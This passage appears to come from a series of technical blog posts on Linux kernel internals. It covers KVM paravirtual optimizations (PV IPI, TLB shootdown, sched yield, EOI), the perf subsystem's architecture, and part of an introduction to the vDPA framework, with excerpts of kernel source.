    +			kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
    +				(unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
    +			min = max = apic_id;
    +			ipi_bitmap = 0;
    +		}
    +		__set_bit(apic_id - min, (unsigned long *)&ipi_bitmap);
    +	}
    +
    +	if (ipi_bitmap) {
    +		kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
    +			(unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
    +	}
    +
    +	local_irq_restore(flags);
    +}

It will set the bitmap accross the IPI target vcpu and finally call the kvm_hypercall(KVM_HC_SEND_IPI)

PV TLB Shootdown

This feature is also from Wanpeng Li in tencent.

A TLB(translation Lookside Buffer) is a cache contains the translations from virtul memory address to physical memory address. When one CPU changes the virt-to-physical mappping. It needs to tell other CPUs to invalidate the mapping in their TLB cache. This is called TLB shootdown.

TLB shootdown is performance critical operation. In bare-metal it is implemented by the architecture and can be completed with very low latencies.

However in virtualization environment, the target vCPU can be preempted and blocked. In this scenario, the TLB flush initiator vCPU will end up busy-waiting for a long time to wait for the preempted vCPU come to run. It is unefficient.

In pv TLB shootdown the TLB flush initiator vCPU will not wait the sleeping vCPU instead it just set a flag in the guest-vmm shared area and then kvm will check this flag and do the TLB flush when the sleeping vCPU come to run.

kvm side

First as other pv optimization, we need to expose pv tlb shootdown to guest.

    case KVM_CPUID_FEATURES:
        entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
                (1 << KVM_FEATURE_NOP_IO_DELAY) |
                (1 << KVM_FEATURE_CLOCKSOURCE2) |
                (1 << KVM_FEATURE_ASYNC_PF) |
                (1 << KVM_FEATURE_PV_EOI) |
                (1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
                (1 << KVM_FEATURE_PV_UNHALT) |
                (1 << KVM_FEATURE_PV_TLB_FLUSH) |
                (1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |

PV tlb shootdown resues the preepted field in ‘kvm_steal_time’ to expose the vcpu running/preempted information to the guest. When the vcpu is running from preempted. If it finds the flush flag. It will do the flush.

    record_steam_time()
    {
        if (xchg(&st->preempted, 0) & KVM_VCPU_FLUSH_TLB)
            kvm_vcpu_flush_tlb_guest(vcpu);
    }

When the vcpu is preempted, ‘KVM_VCPU_PREEMPTED’ will be assigned to ‘st.preempted’.

    static void kvm_steal_time_set_preempted(struct kvm_vcpu *vcpu)
    {
        st->preempted = vcpu->arch.st.preempted = KVM_VCPU_PREEMPTED;
    }

guest side

When the guest startup, it will check whether the guest supports ‘KVM_FEATURE_PV_TLB_FLUSH’ feature. If it does the ‘kvm_flush_tlb_others’ will be replaced.

    if (pv_tlb_flush_supported()) {
        pv_ops.mmu.flush_tlb_others = kvm_flush_tlb_others;
        pv_ops.mmu.tlb_remove_table = tlb_remove_table;
        pr_info("KVM setup pv remote TLB flush\n");
    }

    static bool pv_tlb_flush_supported(void)
    {
        return (kvm_para_has_feature(KVM_FEATURE_PV_TLB_FLUSH) &&
            !kvm_para_has_hint(KVM_HINTS_REALTIME) &&
            kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
    }

guest TLB flush

When the guest does pv shootdown, ‘kvm_flush_tlb_others’ will be called.

    static void kvm_flush_tlb_others(const struct cpumask *cpumask,
                const struct flush_tlb_info *info)
    {
        u8 state;
        int cpu;
        struct kvm_steal_time *src;
        struct cpumask *flushmask = this_cpu_cpumask_var_ptr(__pv_cpu_mask);

        cpumask_copy(flushmask, cpumask);
        /*
        * We have to call flush only on online vCPUs. And
        * queue flush_on_enter for pre-empted vCPUs
        */
        for_each_cpu(cpu, flushmask) {
            src = &per_cpu(steal_time, cpu);
            state = READ_ONCE(src->preempted);
            if ((state & KVM_VCPU_PREEMPTED)) {
                if (try_cmpxchg(&src->preempted, &state,
                        state | KVM_VCPU_FLUSH_TLB))
                    __cpumask_clear_cpu(cpu, flushmask);
            }
        }

        native_flush_tlb_others(flushmask, info);
    }

Here we can see it will try to read the ‘src->preempted’ it has ‘KVM_VCPU_PREEMPTED’ bit set, the ‘KVM_VCPU_FLUSH_TLB’ will be set in the ‘src->preempted’. Thus when the vcpu is sched in it will does the tlb flush.

PV sched yield

This feature also from Wanpeng Li, he says in the patch this idea is from Xen. When sending a call-function IPI-many to vCPU, yield(by hypercall) if any of the IPI targhet vCPU was preempted.

kvm side

First we need to export this feature to the guest.

    case KVM_CPUID_FEATURES:
        entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
                ...
                (1 << KVM_FEATURE_PV_SCHED_YIELD) |

Then we need to implement the hypercall handler to process the yield hypercall.

    int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
    {
        case KVM_HC_SCHED_YIELD:
            kvm_sched_yield(vcpu->kvm, a0);
            ret = 0;
            break;
    }

    static void kvm_sched_yield(struct kvm *kvm, unsigned long dest_id)
    {
        struct kvm_vcpu *target = NULL;
        struct kvm_apic_map *map;

        rcu_read_lock();
        map = rcu_dereference(kvm->arch.apic_map);

        if (likely(map) && dest_id <= map->max_apic_id && map->phys_map[dest_id])
            target = map->phys_map[dest_id]->vcpu;

        rcu_read_unlock();

        if (target && READ_ONCE(target->ready))
            kvm_vcpu_yield_to(target);
    }

Find the target vcpu and yield to it.

guest side

When the guest startup it will replace the ‘smp_ops.send_call_func_ipi’ with ‘kvm_smp_send_call_func_ipi’ if the PV sched yield feature supported.

    static void __init kvm_guest_init(void)
    {
        if (pv_sched_yield_supported()) {
            smp_ops.send_call_func_ipi = kvm_smp_send_call_func_ipi;
            pr_info("KVM setup pv sched yield\n");
        }
    }

    static bool pv_sched_yield_supported(void)
    {
        return (kvm_para_has_feature(KVM_FEATURE_PV_SCHED_YIELD) &&
            !kvm_para_has_hint(KVM_HINTS_REALTIME) &&
            kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
    }

guest trigger call-function IPI-many

When the guest send call func IPI, first the current vcpu will call ‘native_send_call_func_ipi’ to send IPI to the target vcpu. If the target vCPU is preempted, it will issue a hypercall ‘ KVM_HC_SCHED_YIELD’. Notice we just do this for the first vcpu as the target vcpu’s state can be changed underneath.

    static void kvm_smp_send_call_func_ipi(const struct cpumask *mask)
    {
        int cpu;

        native_send_call_func_ipi(mask);

        /* Make sure other vCPUs get a chance to run if they need to. */
        for_each_cpu(cpu, mask) {
            if (vcpu_is_preempted(cpu)) {
                kvm_hypercall1(KVM_HC_SCHED_YIELD, per_cpu(x86_cpu_to_apicid, cpu));
                break;
            }
        }
    }

PV EOI

PV EOI is another (old) pv optimization. The idea behind pv eoi is to avoid the EOI write in APIC. This exit is expensive. PV EOI uses a shared memory just like many of the optimization above. The VMM set a flag in this shared memory before injecting the interrupt, when the guest process the interrupt and write an EOI, if it finds this flag it will clear it and just return.

kvm side

First of all the kvm should expose this feature to the guest.

    case KVM_CPUID_FEATURES:
        entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
                ...
                (1 << KVM_FEATURE_PV_EOI) |

The guest will write write the ‘MSR_KVM_PV_EOI_EN’ to set the gpa of the shared memroy and set the enable bit.

    case MSR_KVM_PV_EOI_EN:
        if (kvm_lapic_enable_pv_eoi(vcpu, data, sizeof(u8)))
            return 1;

    int kvm_lapic_enable_pv_eoi(struct kvm_vcpu *vcpu, u64 data, unsigned long len)
    {
        u64 addr = data & ~KVM_MSR_ENABLED;
        struct gfn_to_hva_cache *ghc = &vcpu->arch.pv_eoi.data;
        unsigned long new_len;

        if (!IS_ALIGNED(addr, 4))
            return 1;

        vcpu->arch.pv_eoi.msr_val = data;
        if (!pv_eoi_enabled(vcpu))
            return 0;

        if (addr == ghc->gpa && len <= ghc->len)
            new_len = ghc->len;
        else
            new_len = len;

        return kvm_gfn_to_hva_cache_init(vcpu->kvm, ghc, addr, new_len);
    }

The ‘apic_sync_pv_eoi_to_guest’ will be called when vmentry.

    static void apic_sync_pv_eoi_to_guest(struct kvm_vcpu *vcpu,
                        struct kvm_lapic *apic)
    {
        if (!pv_eoi_enabled(vcpu) ||
            /* IRR set or many bits in ISR: could be nested. */
            apic->irr_pending ||
            /* Cache not set: could be safe but we don't bother. */
            apic->highest_isr_cache == -1 ||
            /* Need EOI to update ioapic. */
            kvm_ioapic_handles_vector(apic, apic->highest_isr_cache)) {
            /*
            * PV EOI was disabled by apic_sync_pv_eoi_from_guest
            * so we need not do anything here.
            */
            return;
        }

        pv_eoi_set_pending(apic->vcpu);
    }

‘pv_eoi_set_pending’ will set the ‘KVM_PV_EOI_ENABLED’ flag in shared memory.

    static void pv_eoi_set_pending(struct kvm_vcpu *vcpu)
    {
        if (pv_eoi_put_user(vcpu, KVM_PV_EOI_ENABLED) < 0) {
            printk(KERN_WARNING "Can't set EOI MSR value: 0x%llx\n",
                (unsigned long long)vcpu->arch.pv_eoi.msr_val);
            return;
        }
        __set_bit(KVM_APIC_PV_EOI_PENDING, &vcpu->arch.apic_attention);
    }

The ‘apic_sync_pv_eoi_from_guest’ will be called when vmexit or cancel interrupt.

    static void apic_sync_pv_eoi_from_guest(struct kvm_vcpu *vcpu,
                        struct kvm_lapic *apic)
    {
        bool pending;
        int vector;
        /*
        * PV EOI state is derived from KVM_APIC_PV_EOI_PENDING in host
        * and KVM_PV_EOI_ENABLED in guest memory as follows:
        *
        * KVM_APIC_PV_EOI_PENDING is unset:
        * 	-> host disabled PV EOI.
        * KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is set:
        * 	-> host enabled PV EOI, guest did not execute EOI yet.
        * KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is unset:
        * 	-> host enabled PV EOI, guest executed EOI.
        */
        BUG_ON(!pv_eoi_enabled(vcpu));
        pending = pv_eoi_get_pending(vcpu);
        /*
        * Clear pending bit in any case: it will be set again on vmentry.
        * While this might not be ideal from performance point of view,
        * this makes sure pv eoi is only enabled when we know it's safe.
        */
        pv_eoi_clr_pending(vcpu);
        if (pending)
            return;
        vector = apic_set_eoi(apic);
        trace_kvm_pv_eoi(apic, vector);
    }

‘pv_eoi_get_pending’ will get the status of the shared flag. If it is still pending, it means the no guest trigger the EOI write, nothing to do. If the guest trigger the EOI here will call ‘apic_set_eoi’ set the EOI of APIC. Note the ‘apic->irr_pending’ will always be true with virtual interrupt delivery enabled. So pv eoi today I think is little used as the APICv is very common.

guest side

When the guest startup, it will write the ‘MSR_KVM_PV_EOI_EN’ with the ‘kvm_apic_eoi’ address and ‘KVM_MSR_ENABLED’ bit.

    static void kvm_guest_cpu_init(void)
    {
        ...
        if (kvm_para_has_feature(KVM_FEATURE_PV_EOI)) {
            unsigned long pa;

            /* Size alignment is implied but just to make it explicit. */
            BUILD_BUG_ON(__alignof__(kvm_apic_eoi) < 4);
            __this_cpu_write(kvm_apic_eoi, 0);
            pa = slow_virt_to_phys(this_cpu_ptr(&kvm_apic_eoi))
                | KVM_MSR_ENABLED;
            wrmsrl(MSR_KVM_PV_EOI_EN, pa);
        }
        ...
    }

Also it will set the ‘eoi_write’ callback with ‘kvm_guest_apic_eoi_write’.

    void kvm_guest_init(void)
    {
        if (kvm_para_has_feature(KVM_FEATURE_PV_EOI))
        apic_set_eoi_write(kvm_guest_apic_eoi_write);
    }


    void __init apic_set_eoi_write(void (*eoi_write)(u32 reg, u32 v))
    {
        struct apic **drv;

        for (drv = __apicdrivers; drv < __apicdrivers_end; drv++) {
            /* Should happen once for each apic */
            WARN_ON((*drv)->eoi_write == eoi_write);
            (*drv)->native_eoi_write = (*drv)->eoi_write;
            (*drv)->eoi_write = eoi_write;
        }
    }

guest trigger EOI

When the guest write EOI,’kvm_guest_apic_eoi_write’ will be called. It first check whether ‘KVM_PV_EOI_BIT’ is set. If it is, it will clear it and return. Avoid the VM-exit.

    static notrace void kvm_guest_apic_eoi_write(u32 reg, u32 val)
    {
        /**
        * This relies on __test_and_clear_bit to modify the memory
        * in a way that is atomic with respect to the local CPU.
        * The hypervisor only accesses this memory from the local CPU so
        * there's no need for lock or memory barriers.
        * An optimization barrier is implied in apic write.
        */
        if (__test_and_clear_bit(KVM_PV_EOI_BIT, this_cpu_ptr(&kvm_apic_eoi)))
            return;
        apic->native_eoi_write(APIC_EOI, APIC_EOI_ACK);
    }

Linux kernel perf architecture

2020-08-29T00:00:00+00:00

Component overview

Linux perf subsystem is very useful in performance profiling. Following shows the perf subsystem componenet, from this post.

‘perf’ is the user program that can be used to do performance profiling.

There only exposed to userspace syscall perf_event_open returns an perf event fd. This syscall has no glibc wrapper. More info can be read in man page. This function is one of the most complicated function.

‘perf_event’ is the core struct in kernel. There are several types of perf event, such as tracepoint, software, hardware.

We can also attach eBPF program to trae event through perf event fd.

Abstract layer

Following shows the abstract layer of perf.

Every type perf event has a corresponding PMU(performance monitor unit). For example the tracepoint pmu has following pmu.

    static struct pmu perf_tracepoint = {
        .task_ctx_nr	= perf_sw_context,

        .event_init	= perf_tp_event_init,
        .add		= perf_trace_add,
        .del		= perf_trace_del,
        .start		= perf_swevent_start,
        .stop		= perf_swevent_stop,
        .read		= perf_swevent_read,
    };

The hardware related PMU has the arch-spec related abstract structure like the ‘struct x86_pmu’. The hardware related structure will read/write the performance monitor MSR.

Every PMU is registerd by calling ‘perf_pmu_register’.

Perf event context

The perf can monitor cpu-related and task-related events. And both of them can have several monitored events. So we need a context to connects the events. This is ‘perf_event_context’.

There are two kinds of context, software and hardware, defined as follows:

    enum perf_event_task_context {
        perf_invalid_context = -1,
        perf_hw_context = 0,
        perf_sw_context,
        perf_nr_task_contexts,
    };

For CPU level, the context is defined as ‘perf_cpu_context’ and is defined as percpu variable in ‘struct pmu’.

    struct pmu {
        ...
        struct perf_cpu_context __percpu *pmu_cpu_context;
    };

If the PMU is the same type, they will share one ‘struct perf_cpu_context’.

    int perf_pmu_register(struct pmu *pmu, const char *name, int type)
    {
        int cpu, ret, max = PERF_TYPE_MAX;

        mutex_lock(&pmus_lock);
        ...
        pmu->pmu_cpu_context = find_pmu_context(pmu->task_ctx_nr);
        if (pmu->pmu_cpu_context)
            goto got_cpu_context;

        ret = -ENOMEM;
        pmu->pmu_cpu_context = alloc_percpu(struct perf_cpu_context);
        if (!pmu->pmu_cpu_context)
            goto free_dev;

        for_each_possible_cpu(cpu) {
            struct perf_cpu_context *cpuctx;

            cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
            __perf_event_init_context(&cpuctx->ctx);
            lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
            lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
            cpuctx->ctx.pmu = pmu;
            cpuctx->online = cpumask_test_cpu(cpu, perf_online_mask);

            __perf_mux_hrtimer_init(cpuctx, cpu);

            cpuctx->heap_size = ARRAY_SIZE(cpuctx->heap_default);
            cpuctx->heap = cpuctx->heap_default;
        }

    ...
    }

Following pic shows the related structure, from this post.

For task level, the ‘task_struct’ has a pointer array defined as this:

    struct task_struct {
        struct perf_event_context	*perf_event_ctxp[perf_nr_task_contexts];
    };

Following pic shows the related structure, also from this post.

The CPU level perf event will be triggered while the cpu is online. But for task level perf event, it will be only trigged by running the task. The ‘perf_cpu_context’s task_ctx contains the current running task’s perf context.

Perf event context schedule

One of the perf’s work is to schedule in and out the perf_event_context of the task.

Following pic shows the task schedule in and out function related with perf.

Finally the PMU’s add and del callback will be called. Let’s use tracepoint as an example. The add callback is ‘perf_trace_add’ and the del callback is ‘perf_trace_add’.

    int perf_trace_add(struct perf_event *p_event, int flags)
    {
        struct trace_event_call *tp_event = p_event->tp_event;

        if (!(flags & PERF_EF_START))
            p_event->hw.state = PERF_HES_STOPPED;

        /*
        * If TRACE_REG_PERF_ADD returns false; no custom action was performed
        * and we need to take the default action of enqueueing our event on
        * the right per-cpu hlist.
        */
        if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_ADD, p_event)) {
            struct hlist_head __percpu *pcpu_list;
            struct hlist_head *list;

            pcpu_list = tp_event->perf_events;
            if (WARN_ON_ONCE(!pcpu_list))
                return -EINVAL;

            list = this_cpu_ptr(pcpu_list);
            hlist_add_head_rcu(&p_event->hlist_entry, list);
        }

        return 0;
    }

    void perf_trace_del(struct perf_event *p_event, int flags)
    {
        struct trace_event_call *tp_event = p_event->tp_event;

        /*
        * If TRACE_REG_PERF_DEL returns false; no custom action was performed
        * and we need to take the default action of dequeueing our event from
        * the right per-cpu hlist.
        */
        if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_DEL, p_event))
            hlist_del_rcu(&p_event->hlist_entry);
    }

The ‘perf_event’ will be added or removed to the ‘tp_event->perf_events’ lists.

perf_event_open flow

    perf_event_open
        ->perf_copy_attr
        ->get_unused_fd_flags(fd)
        ->perf_event_alloc
            ->perf_init_event
                ->perf_try_init_event
                    ->pmu->event_init()
        ->find_get_context
        ->perf_install_in_context
            ->__perf_install_in_context
                ->add_event_to_ctx
                    ->list_add_event
                    ->perf_group_attach
            ->add_event_to_ctx
        ->fd_install

perf_event_open will call ‘pmu->event_init’ to initialize the event. And add the perf_event to a perf_event_context.

tracepoint event in perf

Recall the definition of tracepoint PMU.

    static struct pmu perf_tracepoint = {
        .task_ctx_nr	= perf_sw_context,

        .event_init	= perf_tp_event_init,
        .add		= perf_trace_add,
        .del		= perf_trace_del,
        .start		= perf_swevent_start,
        .stop		= perf_swevent_stop,
        .read		= perf_swevent_read,
    };

Let’s try to figure how the perf subsystem monitor tracepoint event.

perf event initialization

‘perf_tp_event_init’ is called.

perf_tp_event_init
    ->perf_trace_init
        ->perf_trace_event_init
            ->perf_trace_event_reg
                ->tp_event->class->reg(TRACE_REG_PERF_REGISTER)

‘perf_trace_init’ will find the specified tracepoint.

‘perf_trace_event_reg’ will allocate and initliaze ‘tp_event_perf_events’ list. and call the ‘tp_event->class->reg’ with TRACE_REG_PERF_REGISTER.

static int perf_trace_event_reg(struct trace_event_call *tp_event,
                struct perf_event *p_event)
{
    struct hlist_head __percpu *list;
    int ret = -ENOMEM;
    int cpu;

    p_event->tp_event = tp_event;
    if (tp_event->perf_refcount++ > 0)
        return 0;

    list = alloc_percpu(struct hlist_head);
    if (!list)
        goto fail;

    for_each_possible_cpu(cpu)
        INIT_HLIST_HEAD(per_cpu_ptr(list, cpu));

    tp_event->perf_events = list;

    ...
    ret = tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);
    if (ret)
        goto fail;

    total_ref_count++;
    return 0;
    ...
}

The ‘tp_event->class->reg’ callback is ‘trace_event_reg’.

    int trace_event_reg(struct trace_event_call *call,
                enum trace_reg type, void *data)
    {
        struct trace_event_file *file = data;

        WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
        switch (type) {
        ...

    #ifdef CONFIG_PERF_EVENTS
        case TRACE_REG_PERF_REGISTER:
            return tracepoint_probe_register(call->tp,
                            call->class->perf_probe,
                            call);
        case TRACE_REG_PERF_UNREGISTER:
            tracepoint_probe_unregister(call->tp,
                            call->class->perf_probe,
                            call);
            return 0;
        case TRACE_REG_PERF_OPEN:
        case TRACE_REG_PERF_CLOSE:
        case TRACE_REG_PERF_ADD:
        case TRACE_REG_PERF_DEL:
            return 0;
    #endif
        }
        return 0;
    }

We can see the ‘call->class->perf_probe’ will be register to the tracepoint. From my post. We know that this ‘perf_probe’ is ‘perf_trace_##call’.

    static notrace void							\
    perf_trace_##call(void *__data, proto)					\
    {									\
        struct trace_event_call *event_call = __data;			\
        struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
        struct trace_event_raw_##call *entry;				\
        struct pt_regs *__regs;						\
        u64 __count = 1;						\
        struct task_struct *__task = NULL;				\
        struct hlist_head *head;					\
        int __entry_size;						\
        int __data_size;						\
        int rctx;							\
                                        \
        __data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
                                        \
        head = this_cpu_ptr(event_call->perf_events);			\
        if (!bpf_prog_array_valid(event_call) &&			\
            __builtin_constant_p(!__task) && !__task &&			\
            hlist_empty(head))						\
            return;							\
                                        \
        __entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
                    sizeof(u64));				\
        __entry_size -= sizeof(u32);					\
                                        \
        entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx);	\
        if (!entry)							\
            return;							\
                                        \
        perf_fetch_caller_regs(__regs);					\
                                        \
        tstruct								\
                                        \
        { assign; }							\
                                        \
        perf_trace_run_bpf_submit(entry, __entry_size, rctx,		\
                    event_call, __count, __regs,		\
                    head, __task);			\
    }

If the ‘event_call->perf_events’ is empty, it indicates there is no perf_event current added to this tracepoint. This is the default status when ‘perf_event_open’ initialize a perf_event.

perf event add

When the task is scheded in CPU, the ‘pmu->add’ will be called and it will link the ‘perf_event’ to the ‘event_call->perf_events’ linked lists.

perf event del

When the task is scheded out from CPU, the ‘pmu->del’ will be called and it will remove the ‘perf_event’ from the ‘event_call->perf_events’ linked lists.

perf event trigger

If the ‘event_call->perf_events’ is not empty, the ‘perf_trace_run_bpf_submit’ will ba called. If no eBPF program attached, the ‘perf_tp_event’ will be called.

    void perf_tp_event(u16 event_type, u64 count, void *record, int entry_size,
            struct pt_regs *regs, struct hlist_head *head, int rctx,
            struct task_struct *task)
    {
        struct perf_sample_data data;
        struct perf_event *event;

        struct perf_raw_record raw = {
            .frag = {
                .size = entry_size,
                .data = record,
            },
        };

        perf_sample_data_init(&data, 0, 0);
        data.raw = &raw;

        perf_trace_buf_update(record, event_type);

        hlist_for_each_entry_rcu(event, head, hlist_entry) {
            if (perf_tp_event_match(event, &data, regs))
                perf_swevent_event(event, count, &data, regs);
        }

        ...
        perf_swevent_put_recursion_context(rctx);
    }

For every ‘perf_event’ in ‘event_call->perf_events’ list. It call perf_swevent_event to trigger a perf event.

    static void perf_swevent_event(struct perf_event *event, u64 nr,
                    struct perf_sample_data *data,
                    struct pt_regs *regs)
    {
        struct hw_perf_event *hwc = &event->hw;

        local64_add(nr, &event->count);

        if (!regs)
            return;

        if (!is_sampling_event(event))
            return;

        if ((event->attr.sample_type & PERF_SAMPLE_PERIOD) && !event->attr.freq) {
            data->period = nr;
            return perf_swevent_overflow(event, 1, data, regs);
        } else
            data->period = event->hw.last_period;

        if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
            return perf_swevent_overflow(event, 1, data, regs);

        if (local64_add_negative(nr, &hwc->period_left))
            return;

        perf_swevent_overflow(event, 0, data, regs);
    }

‘perf_swevent_event’ add the ‘event->count’. If the event is not sampling it just returns. Tis is the perf count mode. If the perf_event is in sample mode, it needs to copy the tracepoint data. Following is the callchain.

    perf_swevent_overflow->__perf_event_overflow->event->overflow_handler(perf_event_output).

software perf event

Software PMU is defined as following:

    static struct pmu perf_swevent = {
        .task_ctx_nr	= perf_sw_context,

        .capabilities	= PERF_PMU_CAP_NO_NMI,

        .event_init	= perf_swevent_init,
        .add		= perf_swevent_add,
        .del		= perf_swevent_del,
        .start		= perf_swevent_start,
        .stop		= perf_swevent_stop,
        .read		= perf_swevent_read,
    };

perf event initialization

‘perf_swevent_init’ will be called. It call ‘swevent_hlist_get’

    static int perf_swevent_init(struct perf_event *event)
    {
        u64 event_id = event->attr.config;

        if (event->attr.type != PERF_TYPE_SOFTWARE)
            return -ENOENT;

        /*
        * no branch sampling for software events
        */
        if (has_branch_stack(event))
            return -EOPNOTSUPP;

        switch (event_id) {
        case PERF_COUNT_SW_CPU_CLOCK:
        case PERF_COUNT_SW_TASK_CLOCK:
            return -ENOENT;

        default:
            break;
        }

        if (event_id >= PERF_COUNT_SW_MAX)
            return -ENOENT;

        if (!event->parent) {
            int err;

            err = swevent_hlist_get();
            if (err)
                return err;

            static_key_slow_inc(&perf_swevent_enabled[event_id]);
            event->destroy = sw_perf_event_destroy;
        }

        return 0;
    }

This creates a percpu ‘swhash->swevent_hlist’ lists. Also set perf_swevent_enabled[event_id] to true.

perf event add

‘perf_swevent_add’ adds the perf_event to the percpu hash lists.

    static int perf_swevent_add(struct perf_event *event, int flags)
    {
        struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
        struct hw_perf_event *hwc = &event->hw;
        struct hlist_head *head;

        if (is_sampling_event(event)) {
            hwc->last_period = hwc->sample_period;
            perf_swevent_set_period(event);
        }

        hwc->state = !(flags & PERF_EF_START);

        head = find_swevent_head(swhash, event);
        if (WARN_ON_ONCE(!head))
            return -EINVAL;

        hlist_add_head_rcu(&event->hlist_entry, head);
        perf_event_update_userpage(event);

        return 0;
    }

perf event del

‘perf_swevent_del’ remove from the hash lists.

    static void perf_swevent_del(struct perf_event *event, int flags)
    {
        hlist_del_rcu(&event->hlist_entry);
    }

perf event trigger

Take the task switch as an example.

The ‘perf_sw_event_sched’ will be called.

    static inline void perf_event_task_sched_out(struct task_struct *prev,
                            struct task_struct *next)
    {
        perf_sw_event_sched(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, 0);

        if (static_branch_unlikely(&perf_sched_events))
            __perf_event_task_sched_out(prev, next);
    }

After perf_event_task_sched_out->_perf_sw_event->do_perf_sw_event callchain.

    static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
                        u64 nr,
                        struct perf_sample_data *data,
                        struct pt_regs *regs)
    {
        struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
        struct perf_event *event;
        struct hlist_head *head;

        rcu_read_lock();
        head = find_swevent_head_rcu(swhash, type, event_id);
        if (!head)
            goto end;

        hlist_for_each_entry_rcu(event, head, hlist_entry) {
            if (perf_swevent_match(event, type, event_id, data, regs))
                perf_swevent_event(event, nr, data, regs);
        }
    end:
        rcu_read_unlock();
    }

As we can see it finally calls ‘perf_swevent_event’ to trigger a event.

hardware perf event

One of the hardware PMU is defined as follows:

    static struct pmu pmu = {
        .pmu_enable		= x86_pmu_enable,
        .pmu_disable		= x86_pmu_disable,

        .attr_groups		= x86_pmu_attr_groups,

        .event_init		= x86_pmu_event_init,

        .event_mapped		= x86_pmu_event_mapped,
        .event_unmapped		= x86_pmu_event_unmapped,

        .add			= x86_pmu_add,
        .del			= x86_pmu_del,
        .start			= x86_pmu_start,
        .stop			= x86_pmu_stop,
        .read			= x86_pmu_read,

        .start_txn		= x86_pmu_start_txn,
        .cancel_txn		= x86_pmu_cancel_txn,
        .commit_txn		= x86_pmu_commit_txn,

        .event_idx		= x86_pmu_event_idx,
        .sched_task		= x86_pmu_sched_task,
        .task_ctx_size          = sizeof(struct x86_perf_task_context),
        .swap_task_ctx		= x86_pmu_swap_task_ctx,
        .check_period		= x86_pmu_check_period,

        .aux_output_match	= x86_pmu_aux_output_match,
    };

The hardware perf event is quite complicated as it will interact with the hardware. Here will not go deep in the hardware.

perf event init

    x86_pmu_event_init
        ->__x86_pmu_event_init
            ->x86_reserve_hardware
            ->x86_pmu.hw_config()
        ->validate_event

The ‘x86_pmu’ here is a arch-spec PMU structure.

perf event add

x86_pmu_add ->collect_events -> ->x86_pmu.schedule_events() ->x86_pmu.add

‘collect_events’ sets

    cpuc->event_list[n] = leader;

perf event del

x86_pmu_del will delete the event in ‘cpuc->event_list’.

perf event trigger

When the hardware event triggered, it will trigger a NMI interrupt. The handler for this is ‘perf_event_nmi_handler’.

    static int
    perf_event_nmi_handler(unsigned int cmd, struct pt_regs *regs)
    {
        u64 start_clock;
        u64 finish_clock;
        int ret;

        /*
        * All PMUs/events that share this PMI handler should make sure to
        * increment active_events for their events.
        */
        if (!atomic_read(&active_events))
            return NMI_DONE;

        start_clock = sched_clock();
        ret = x86_pmu.handle_irq(regs);
        finish_clock = sched_clock();

        perf_sample_event_took(finish_clock - start_clock);

        return ret;
    }

Taks ‘x86_pmu.handle_irq’=x86_pmu_handle_irq as example.

    for (idx = 0; idx < x86_pmu.num_counters; idx++) {
        if (!test_bit(idx, cpuc->active_mask))
            continue;

        event = cpuc->events[idx];

        val = x86_perf_event_update(event);
        if (val & (1ULL << (x86_pmu.cntval_bits - 1)))
            continue;

        /*
        * event overflow
        */
        handled++;
        perf_sample_data_init(&data, 0, event->hw.last_period);

        if (!x86_perf_event_set_period(event))
            continue;

        if (perf_event_overflow(event, &data, regs))
            x86_pmu_stop(event, 0);
    }

Here we can see it iterates ‘cpuc’ to find which event trigger this interrupt.

vDPA kernel framework introduction

2020-08-22T00:00:00+00:00

Virtual data path acceleration(vDPA) is a new technogy to acclerate the performance (like other hardware offloading). A vDPA device is a device whose datapath compiles with the virtio spec but whose controlpath is vendor-specific.

The vDPA device can be implemented by a device of PF, VF, VDEV, SF. In order to support the vDPA device and hide the complexity of the hardware, vDPA kernel framework has been implemented. Following is the overview architecure which from vDPA Kernel Framework Part #1: vDPA Bus for Abstracting Hardware.

The vDPA framework is used to abstract the vDPA devices and present them as a virtio device to vhost/virtio subsystem. There are three component in vDPA framework.

vDPA bus

The code is in ‘drivers/vdpa/vdpa.c’. The vDPA bus can be used to hold the several types of vdpa bus drivers and vdpa devices. Some of the export function:

‘__vdpa_alloc_device’: This is called from the vDPA device driver, it allocates vdpa device, the ‘vdpa_config_ops’ parameter is used to specify the vendor-specific operations. These operations include ‘virtqueue ops’, ‘device ops’, ‘dma ops’.
‘vdpa_register_device’: register a vDPA device
‘__vdpa_register_driver’: register a vDPA bus driver

vDPA bus is registered when the system is startup.

vDPA device driver

vDPA device driver is used to communicate directly with the vDPA device through the vendor specific method and present a vDPA abstract device to the vDPA bus. There are currently two vDPA device driver.

ifcvf device driver: in drivers/vdpa/ifcvf directory. This is currently the only vDPA hardware device driver in upstream.
vdpa simulator: in drivers/vdpa/vdpa_sim directory. This is just a vDPA simulator device driver.

In the dirver’s probe function, it will call ‘vdpa_register_device’ to register a vDPA device.

vDPA bus driver

vDPA bus driver is used to connect the vDPA bus to vhost and virtio subsystem. There are two types of vDPA bus drivers.

